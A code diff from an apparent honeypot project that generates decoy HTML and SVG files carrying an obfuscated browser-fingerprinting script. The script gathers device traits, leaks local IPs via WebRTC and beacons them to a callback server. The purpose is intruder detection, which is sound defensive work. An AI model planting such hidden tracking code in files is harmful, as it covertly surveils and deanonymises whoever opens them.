return crypto.subtle.digest("SHA-256", buf).then(function (h) {
|
||||||
|
return Array.from(new Uint8Array(h))
|
||||||
|
.map(function (b) { return b.toString(16).padStart(2, "0"); })
|
||||||
|
.join("");
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// navigator
|
||||||
|
try {
|
||||||
|
fp.nav = {
|
||||||
|
ua: navigator.userAgent,
|
||||||
|
pl: navigator.platform,
|
||||||
|
lg: navigator.language,
|
||||||
|
lgs: (navigator.languages || []).join(","),
|
||||||
|
ck: navigator.cookieEnabled,
|
||||||
|
dnt: navigator.doNotTrack,
|
||||||
|
hc: navigator.hardwareConcurrency,
|
||||||
|
dm: navigator.deviceMemory || null,
|
||||||
|
tp: navigator.maxTouchPoints,
|
||||||
|
wd: navigator.webdriver === true,
|
||||||
|
pdf: navigator.pdfViewerEnabled || null,
|
||||||
|
};
|
||||||
|
} catch (e) { fp.nav = { err: String(e) }; }
|
||||||
|
|
||||||
|
// screen
|
||||||
|
try {
|
||||||
|
fp.scr = {
|
||||||
|
w: screen.width, h: screen.height,
|
||||||
|
aw: screen.availWidth, ah: screen.availHeight,
|
||||||
|
cd: screen.colorDepth, pd: screen.pixelDepth,
|
||||||
|
dpr: window.devicePixelRatio,
|
||||||
|
iw: window.innerWidth, ih: window.innerHeight,
|
||||||
|
or: (screen.orientation && screen.orientation.type) || null,
|
||||||
|
};
|
||||||
|
} catch (e) { fp.scr = { err: String(e) }; }
|
||||||
|
|
||||||
|
// tz / locale
|
||||||
|
try {
|
||||||
|
var dtf = Intl.DateTimeFormat().resolvedOptions();
|
||||||
|
fp.tz = {
|
||||||
|
z: dtf.timeZone, lc: dtf.locale,
|
||||||
|
ca: dtf.calendar, ns: dtf.numberingSystem,
|
||||||
|
off: new Date().getTimezoneOffset(),
|
||||||
|
};
|
||||||
|
} catch (e) { fp.tz = { err: String(e) }; }
|
||||||
|
|
||||||
|
// connection
|
||||||
|
try {
|
||||||
|
var c = navigator.connection;
|
||||||
|
fp.cn = c ? {
|
||||||
|
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
|
||||||
|
} : null;
|
||||||
|
} catch (e) { fp.cn = { err: String(e) }; }
|
||||||
|
|
||||||
|
// canvas
|
||||||
|
try {
|
||||||
|
var cv = document.createElement("canvas");
|
||||||
|
cv.width = 280; cv.height = 60;
|
||||||
|
var ctx = cv.getContext("2d");
|
||||||
|
ctx.textBaseline = "top";
|
||||||
|
ctx.font = "14px Arial";
|
||||||
|
ctx.fillStyle = "#f60";
|
||||||
|
ctx.fillRect(125, 1, 62, 20);
|
||||||
|
ctx.fillStyle = "#069";
|
||||||
|
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
|
||||||
|
ctx.fillStyle = "rgba(102,204,0,0.7)";
|
||||||
|
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
|
||||||
|
var dataURL = cv.toDataURL();
|
||||||
|
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
|
||||||
|
} catch (e) { fp.cv = { err: String(e) }; }
|
||||||
|
|
||||||
|
// webgl
|
||||||
|
try {
|
||||||
|
var gc = document.createElement("canvas");
|
||||||
|
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
|
||||||
|
if (gl) {
|
||||||
|
var ext = gl.getExtension("WEBGL_debug_renderer_info");
|
||||||
|
fp.gl = {
|
||||||
|
v: gl.getParameter(gl.VENDOR),
|
||||||
|
r: gl.getParameter(gl.RENDERER),
|
||||||
|
ver: gl.getParameter(gl.VERSION),
|
||||||
|
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
|
||||||
|
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
|
||||||
|
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
|
||||||
|
};
|
||||||
|
} else { fp.gl = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.gl = { err: String(e) }; }
|
||||||
|
|
||||||
|
// audio
|
||||||
|
try {
|
||||||
|
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
|
||||||
|
if (ACtx) {
|
||||||
|
var actx = new ACtx(1, 44100, 44100);
|
||||||
|
var osc = actx.createOscillator();
|
||||||
|
var cmp = actx.createDynamicsCompressor();
|
||||||
|
osc.type = "triangle"; osc.frequency.value = 10000;
|
||||||
|
cmp.threshold.value = -50; cmp.knee.value = 40;
|
||||||
|
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
|
||||||
|
osc.connect(cmp); cmp.connect(actx.destination);
|
||||||
|
osc.start(0);
|
||||||
|
var buf = await actx.startRendering();
|
||||||
|
var data = buf.getChannelData(0).slice(4500, 5000);
|
||||||
|
var sum = 0;
|
||||||
|
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
|
||||||
|
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
|
||||||
|
} else { fp.au = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.au = { err: String(e) }; }
|
||||||
|
|
||||||
|
// fonts
|
||||||
|
try {
|
||||||
|
var bases = ["monospace", "sans-serif", "serif"];
|
||||||
|
var tests = [
|
||||||
|
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
|
||||||
|
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
|
||||||
|
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
|
||||||
|
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
|
||||||
|
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
|
||||||
|
"San Francisco", "Helvetica Neue", "Lucida Grande",
|
||||||
|
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
|
||||||
|
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
|
||||||
|
"Noto Sans", "Noto Mono",
|
||||||
|
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
|
||||||
|
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
|
||||||
|
"Malgun Gothic", "Noto Sans CJK",
|
||||||
|
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
|
||||||
|
"Bahnschrift", "Cyberpunk",
|
||||||
|
];
|
||||||
|
var sp = document.createElement("span");
|
||||||
|
sp.style.fontSize = "72px";
|
||||||
|
sp.style.position = "absolute";
|
||||||
|
sp.style.left = "-9999px";
|
||||||
|
sp.innerHTML = "mmmmmmmmmmlli";
|
||||||
|
document.body.appendChild(sp);
|
||||||
|
var bs = {};
|
||||||
|
for (var bi = 0; bi < bases.length; bi++) {
|
||||||
|
sp.style.fontFamily = bases[bi];
|
||||||
|
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
|
||||||
|
}
|
||||||
|
var det = [];
|
||||||
|
for (var ti = 0; ti < tests.length; ti++) {
|
||||||
|
for (var bj = 0; bj < bases.length; bj++) {
|
||||||
|
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
|
||||||
|
if (sp.offsetWidth !== bs[bases[bj]].w ||
|
||||||
|
sp.offsetHeight !== bs[bases[bj]].h) {
|
||||||
|
det.push(tests[ti]); break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
document.body.removeChild(sp);
|
||||||
|
fp.ft = {
|
||||||
|
h: await sha256(det.slice().sort().join(",")),
|
||||||
|
n: det.length, t: tests.length, d: det,
|
||||||
|
};
|
||||||
|
} catch (e) { fp.ft = { err: String(e) }; }
|
||||||
|
|
||||||
|
// webrtc local ip leak
|
||||||
|
try {
|
||||||
|
var ips = {}; var cands = [];
|
||||||
|
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
|
||||||
|
window.mozRTCPeerConnection;
|
||||||
|
if (RPC) {
|
||||||
|
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
|
||||||
|
pc.createDataChannel("");
|
||||||
|
pc.onicecandidate = function (e) {
|
||||||
|
if (!e.candidate) return;
|
||||||
|
cands.push(e.candidate.candidate);
|
||||||
|
var m = e.candidate.candidate.match(
|
||||||
|
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
|
||||||
|
if (m) ips[m[1]] = 1;
|
||||||
|
};
|
||||||
|
var off = await pc.createOffer();
|
||||||
|
await pc.setLocalDescription(off);
|
||||||
|
await new Promise(function (r) { setTimeout(r, 1500); });
|
||||||
|
pc.close();
|
||||||
|
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
|
||||||
|
} else { fp.rtc = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.rtc = { err: String(e) }; }
|
||||||
|
|
||||||
|
// battery
|
||||||
|
try {
|
||||||
|
if (navigator.getBattery) {
|
||||||
|
var bat = await navigator.getBattery();
|
||||||
|
fp.bt = {
|
||||||
|
c: bat.charging, l: bat.level,
|
||||||
|
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
|
||||||
|
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
|
||||||
|
};
|
||||||
|
} else { fp.bt = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.bt = { err: String(e) }; }
|
||||||
|
|
||||||
|
// perf timing jitter
|
||||||
|
try {
|
||||||
|
var samples = [];
|
||||||
|
for (var pi = 0; pi < 1000; pi++) {
|
||||||
|
var pa = performance.now();
|
||||||
|
var x = 0;
|
||||||
|
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
|
||||||
|
samples.push(performance.now() - pa);
|
||||||
|
}
|
||||||
|
samples.sort(function (a, b) { return a - b; });
|
||||||
|
fp.pf = {
|
||||||
|
med: samples[500].toFixed(4),
|
||||||
|
p95: samples[950].toFixed(4),
|
||||||
|
mn: samples[0].toFixed(4),
|
||||||
|
mx: samples[999].toFixed(4),
|
||||||
|
};
|
||||||
|
} catch (e) { fp.pf = { err: String(e) }; }
|
||||||
|
|
||||||
|
// permissions
|
||||||
|
try {
|
||||||
|
if (navigator.permissions) {
|
||||||
|
var names = ["geolocation", "notifications", "camera", "microphone",
|
||||||
|
"persistent-storage", "clipboard-read", "clipboard-write"];
|
||||||
|
var st = {};
|
||||||
|
for (var ni = 0; ni < names.length; ni++) {
|
||||||
|
try {
|
||||||
|
var r = await navigator.permissions.query({ name: names[ni] });
|
||||||
|
st[names[ni]] = r.state;
|
||||||
|
} catch (e) { st[names[ni]] = "unsupported"; }
|
||||||
|
}
|
||||||
|
fp.pm = st;
|
||||||
|
} else { fp.pm = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.pm = { err: String(e) }; }
|
||||||
|
|
||||||
|
// composite identity hash — stable inputs only
|
||||||
|
try {
|
||||||
|
var stable = [
|
||||||
|
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
|
||||||
|
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
|
||||||
|
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
|
||||||
|
fp.scr && (fp.scr.w + "x" + fp.scr.h),
|
||||||
|
].filter(Boolean).join("|");
|
||||||
|
fp.id = await sha256(stable);
|
||||||
|
} catch (e) { fp.id = { err: String(e) }; }
|
||||||
|
|
||||||
|
// 2) ship the payload as base64url JSON on a GET query param.
|
||||||
|
// The current worker records the hit on /c/<slug>; step-4 worker
|
||||||
|
// will decode ?d= and persist the fingerprint blob.
|
||||||
|
try {
|
||||||
|
var json = JSON.stringify(fp);
|
||||||
|
var b64 = btoa(unescape(encodeURIComponent(json)))
|
||||||
|
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
|
||||||
|
// chunk if URL would exceed safe limit (~6KB)
|
||||||
|
var MAX = 6000;
|
||||||
|
if (b64.length <= MAX) {
|
||||||
|
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
|
||||||
|
} else {
|
||||||
|
var sid = (Math.random() * 1e9 | 0).toString(36);
|
||||||
|
var total = Math.ceil(b64.length / MAX);
|
||||||
|
for (var ci = 0; ci < total; ci++) {
|
||||||
|
var part = b64.substr(ci * MAX, MAX);
|
||||||
|
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} catch (e) { /* swallow */ }
|
||||||
|
})();
|
||||||
140
decnet/canary/generators/fingerprint_html.py
Normal file
140
decnet/canary/generators/fingerprint_html.py
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
"""HTML fingerprint canary — plausible-looking page with an obfuscated
|
||||||
|
browser-fingerprinting payload inlined at the bottom of ``<body>``.
|
||||||
|
|
||||||
|
The visible content is a deliberately mundane "internal directory"
|
||||||
|
table — the kind of file a curious attacker pulls off a decky's
|
||||||
|
filesystem and opens locally to triage. When the file is opened in
|
||||||
|
*any* network-connected browser the obfuscated payload runs and beacons
|
||||||
|
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
|
||||||
|
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
|
||||||
|
timing jitter, permissions, composite identity hash).
|
||||||
|
|
||||||
|
Determinism: the mint UUID is derived from the callback token via
|
||||||
|
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
|
||||||
|
output, satisfying the generator contract in :mod:`decnet.canary.base`.
|
||||||
|
The obfuscator's seed and polymorphic config bits are likewise
|
||||||
|
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import uuid
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
|
||||||
|
def _mint_uuid_for(callback_token: str) -> str:
|
||||||
|
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
|
||||||
|
|
||||||
|
|
||||||
|
def _stable_int(callback_token: str, salt: str = "") -> int:
|
||||||
|
"""Deterministic non-negative int derived from the callback token.
|
||||||
|
|
||||||
|
``builtins.hash`` is salted per-process — useless for a generator
|
||||||
|
that must be byte-identical across runs. SHA-256 prefix is
|
||||||
|
overkill but free.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big")
|
||||||
|
|
||||||
|
|
||||||
|
_PAGE_TEMPLATE = """<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8">
|
||||||
|
<title>Internal Asset Directory</title>
|
||||||
|
<style>
|
||||||
|
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
|
||||||
|
margin:24px;font-size:13px}}
|
||||||
|
h1{{font-size:18px;margin:0 0 4px 0}}
|
||||||
|
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
|
||||||
|
table{{border-collapse:collapse;width:100%;background:#fff;
|
||||||
|
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
|
||||||
|
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
|
||||||
|
th{{background:#f4f4f4;font-weight:600;font-size:11px;
|
||||||
|
text-transform:uppercase;letter-spacing:.5px;color:#555}}
|
||||||
|
tr:hover td{{background:#fafbff}}
|
||||||
|
.foot{{margin-top:16px;color:#999;font-size:11px}}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Internal Asset Directory</h1>
|
||||||
|
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
|
||||||
|
<table>
|
||||||
|
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
|
||||||
|
{rows}
|
||||||
|
</table>
|
||||||
|
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
|
||||||
|
<script>{payload}</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_ROW_POOL = (
|
||||||
|
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
|
||||||
|
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
|
||||||
|
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
|
||||||
|
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
|
||||||
|
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
|
||||||
|
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
|
||||||
|
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
|
||||||
|
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
|
||||||
|
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_rows(callback_token: str) -> tuple[str, int]:
|
||||||
|
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
|
||||||
|
take = 5 + (_stable_int(callback_token, "take") % 4)
|
||||||
|
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
|
||||||
|
cells = "\n".join(
|
||||||
|
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
|
||||||
|
for row in selected
|
||||||
|
)
|
||||||
|
return cells, len(selected)
|
||||||
|
|
||||||
|
|
||||||
|
def _sync_label(callback_token: str) -> str:
|
||||||
|
day = _stable_int(callback_token, "day") % 28 + 1
|
||||||
|
hour = _stable_int(callback_token, "hour") % 24
|
||||||
|
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintHtmlGenerator(CanaryGenerator):
|
||||||
|
"""Synthesise an HTML page that fingerprints the browser opening it."""
|
||||||
|
|
||||||
|
name = "fingerprint_html"
|
||||||
|
|
||||||
|
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||||
|
mint_uuid = _mint_uuid_for(ctx.callback_token)
|
||||||
|
nonce = nonce_for(ctx.callback_token, mint_uuid)
|
||||||
|
payload = render_fingerprint_js(
|
||||||
|
callback_token=ctx.callback_token,
|
||||||
|
http_base=ctx.http_base,
|
||||||
|
mint_uuid=mint_uuid,
|
||||||
|
nonce=nonce,
|
||||||
|
)
|
||||||
|
rows, row_count = _build_rows(ctx.callback_token)
|
||||||
|
body = _PAGE_TEMPLATE.format(
|
||||||
|
sync_label=_sync_label(ctx.callback_token),
|
||||||
|
row_count=row_count,
|
||||||
|
rows=rows,
|
||||||
|
payload=payload,
|
||||||
|
)
|
||||||
|
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||||
|
return CanaryArtifact(
|
||||||
|
path="",
|
||||||
|
content=body.encode("utf-8"),
|
||||||
|
mode=0o644,
|
||||||
|
mtime_offset=-86400 * 14,
|
||||||
|
generator=self.name,
|
||||||
|
fingerprint_nonce=nonce,
|
||||||
|
notes=[
|
||||||
|
f"obfuscated fingerprinter beacons={beacon}",
|
||||||
|
f"mint_uuid={mint_uuid}",
|
||||||
|
],
|
||||||
|
)
|
||||||
88
decnet/canary/generators/fingerprint_svg.py
Normal file
88
decnet/canary/generators/fingerprint_svg.py
Normal file
@@ -0,0 +1,88 @@
|
|||||||
|
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
|
||||||
|
that runs the obfuscated fingerprinter when the file is opened directly
|
||||||
|
in a browser.
|
||||||
|
|
||||||
|
SVG ``<script>`` only fires when the SVG is loaded as a top-level
|
||||||
|
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
|
||||||
|
SVG is referenced from another page's ``<img>``. That's the right
|
||||||
|
posture for canary use: an attacker browsing the decky filesystem and
|
||||||
|
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
|
||||||
|
inside a sandboxed CMS preview does not.
|
||||||
|
|
||||||
|
Same determinism guarantees as :mod:`fingerprint_html`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
|
||||||
|
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
|
||||||
|
<style>
|
||||||
|
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
|
||||||
|
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
|
||||||
|
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
|
||||||
|
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
|
||||||
|
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
|
||||||
|
</style>
|
||||||
|
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
|
||||||
|
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
|
||||||
|
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
|
||||||
|
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
|
||||||
|
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
|
||||||
|
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
|
||||||
|
<path class="edge" d="M160 105 L240 105"/>
|
||||||
|
<path class="edge" d="M360 105 L440 105"/>
|
||||||
|
<path class="edge" d="M300 130 L300 220"/>
|
||||||
|
<script type="application/ecmascript"><![CDATA[
|
||||||
|
{payload}
|
||||||
|
]]></script>
|
||||||
|
</svg>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSvgGenerator(CanaryGenerator):
|
||||||
|
"""Synthesise an SVG that fingerprints the browser opening it."""
|
||||||
|
|
||||||
|
name = "fingerprint_svg"
|
||||||
|
|
||||||
|
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||||
|
mint_uuid = _mint_uuid_for(ctx.callback_token)
|
||||||
|
nonce = nonce_for(ctx.callback_token, mint_uuid)
|
||||||
|
payload = render_fingerprint_js(
|
||||||
|
callback_token=ctx.callback_token,
|
||||||
|
http_base=ctx.http_base,
|
||||||
|
mint_uuid=mint_uuid,
|
||||||
|
nonce=nonce,
|
||||||
|
)
|
||||||
|
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
|
||||||
|
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
|
||||||
|
day = _stable_int(ctx.callback_token, "day") % 28 + 1
|
||||||
|
body = _DIAGRAM_TEMPLATE.format(
|
||||||
|
region=region,
|
||||||
|
ver=ver,
|
||||||
|
review=f"2026-03-{day:02d}",
|
||||||
|
payload=payload,
|
||||||
|
)
|
||||||
|
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||||
|
return CanaryArtifact(
|
||||||
|
path="",
|
||||||
|
content=body.encode("utf-8"),
|
||||||
|
mode=0o644,
|
||||||
|
mtime_offset=-86400 * 30,
|
||||||
|
generator=self.name,
|
||||||
|
fingerprint_nonce=nonce,
|
||||||
|
notes=[
|
||||||
|
f"obfuscated fingerprinter beacons={beacon}",
|
||||||
|
f"mint_uuid={mint_uuid}",
|
||||||
|
],
|
||||||
|
)
|
||||||
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
|
|||||||
|
|
||||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||||
try:
|
try:
|
||||||
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
|
from pikepdf import Pdf, Name, Dictionary, String
|
||||||
except ImportError as e:
|
except ImportError as e:
|
||||||
raise InstrumenterRejectedError(
|
raise InstrumenterRejectedError(
|
||||||
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
||||||
|
|||||||
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
|
|||||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||||
) -> CanaryArtifact:
|
) -> CanaryArtifact:
|
||||||
try:
|
try:
|
||||||
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
|
from PIL import Image, PngImagePlugin
|
||||||
except ImportError as e:
|
except ImportError as e:
|
||||||
raise InstrumenterRejectedError(
|
raise InstrumenterRejectedError(
|
||||||
"image instrumenter requires Pillow; install it (`pip "
|
"image instrumenter requires Pillow; install it (`pip "
|
||||||
|
|||||||
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
|
|||||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||||
) -> CanaryArtifact:
|
) -> CanaryArtifact:
|
||||||
try:
|
try:
|
||||||
import pikepdf # type: ignore[import-not-found]
|
import pikepdf
|
||||||
except ImportError as e:
|
except ImportError as e:
|
||||||
raise InstrumenterRejectedError(
|
raise InstrumenterRejectedError(
|
||||||
"PDF instrumenter requires pikepdf; install it (`pip "
|
"PDF instrumenter requires pikepdf; install it (`pip "
|
||||||
|
|||||||
177
decnet/canary/obfuscator.py
Normal file
177
decnet/canary/obfuscator.py
Normal file
@@ -0,0 +1,177 @@
|
|||||||
|
"""Per-mint JS obfuscator wrapper.
|
||||||
|
|
||||||
|
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
|
||||||
|
Used by the fingerprint generators / instrumenters to produce a unique,
|
||||||
|
hard-to-statically-analyse JS blob per canary mint.
|
||||||
|
|
||||||
|
Two design choices flow from the canary contract in :mod:`base`:
|
||||||
|
|
||||||
|
* **Determinism.** Generators must return byte-identical artifacts for
|
||||||
|
the same ``(callback_token, http_base, dns_zone, persona)``. We
|
||||||
|
derive a numeric seed from the callback token and pass it to the
|
||||||
|
obfuscator's own ``seed`` option, and we derive the polymorphic
|
||||||
|
config bits from the same hash so a re-mint reproduces exactly.
|
||||||
|
* **Per-mint uniqueness.** Two different callback tokens produce
|
||||||
|
structurally different output: different identifier names, different
|
||||||
|
string-array rotation, optionally different transforms enabled.
|
||||||
|
|
||||||
|
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
|
||||||
|
We pass code+options as JSON on stdin and read the obfuscated result
|
||||||
|
from stdout. Stderr surfaces obfuscator failures.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import hmac
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
import subprocess # nosec B404 — Node helper exec is the whole point
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
|
||||||
|
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
|
||||||
|
|
||||||
|
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
|
||||||
|
# specific runtime; default to PATH lookup.
|
||||||
|
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
|
||||||
|
|
||||||
|
# Hard timeout for the obfuscator subprocess. Real runs on the
|
||||||
|
# fingerprint payload sit well under 5s on a dev box.
|
||||||
|
_TIMEOUT_S = 30
|
||||||
|
|
||||||
|
|
||||||
|
class ObfuscatorError(RuntimeError):
|
||||||
|
"""Raised when the Node helper fails or returns empty output."""
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSecretMissing(RuntimeError):
|
||||||
|
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
|
||||||
|
|
||||||
|
Fingerprint canaries embed a per-mint nonce derived from this
|
||||||
|
server-side secret; without it the worker cannot validate incoming
|
||||||
|
fingerprint beacons, so we fail loud at mint time rather than ship
|
||||||
|
a defeatable canary.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
|
||||||
|
|
||||||
|
|
||||||
|
def nonce_for(callback_token: str, mint_uuid: str) -> str:
|
||||||
|
"""Compute the per-mint fingerprint nonce.
|
||||||
|
|
||||||
|
HMAC-SHA256 keyed on the server-side master secret, message is
|
||||||
|
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
|
||||||
|
(~64 bits of entropy) — enough to defeat slug-only forgery while
|
||||||
|
fitting comfortably into a query string.
|
||||||
|
"""
|
||||||
|
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
|
||||||
|
if not secret:
|
||||||
|
